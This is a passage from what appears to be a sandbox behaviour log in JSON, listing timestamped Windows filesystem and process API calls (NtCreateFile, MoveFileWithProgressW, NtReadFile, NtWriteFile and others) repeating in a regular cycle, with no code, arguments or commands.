{"category": 
"filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,981", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,991", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,001", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:48,001", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,001", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,011", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:48,021", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,021", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,031", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,041", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,051", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,061", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,061", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,071", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,081", "api": "NtFreeVirtualMemory"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,091", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,091", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,091", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,091", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,091", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,091", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,091", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,091", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,101", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:48,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,111", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,121", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,121", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,121", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,121", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,121", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,121", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,131", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:48,131", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,131", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,141", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,141", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,141", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,141", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,141", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,141", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,141", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,151", 
"api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,151", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,161", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,161", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,171", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,171", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,171", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,171", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,171", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,171", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,171", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,171", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,181", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,181", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,181", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,181", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,181", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,181", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,181", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,181", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,191", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,191", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,201", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,201", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,201", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,211", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,211", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:48,221", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,221", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,231", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,231", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,231", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,231", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,231", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,231", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,231", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,231", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,242", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,242", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:48,252", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,252", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,252", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,262", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,262", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,262", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,262", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,262", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,262", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,262", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,262", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,272", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,272", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,272", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,272", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,272", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,272", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,272", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,272", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,282", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,282", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,292", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,292", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,292", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,302", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,302", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,312", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,312", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,322", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,322", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,322", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,322", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,322", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,322", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,322", "api": 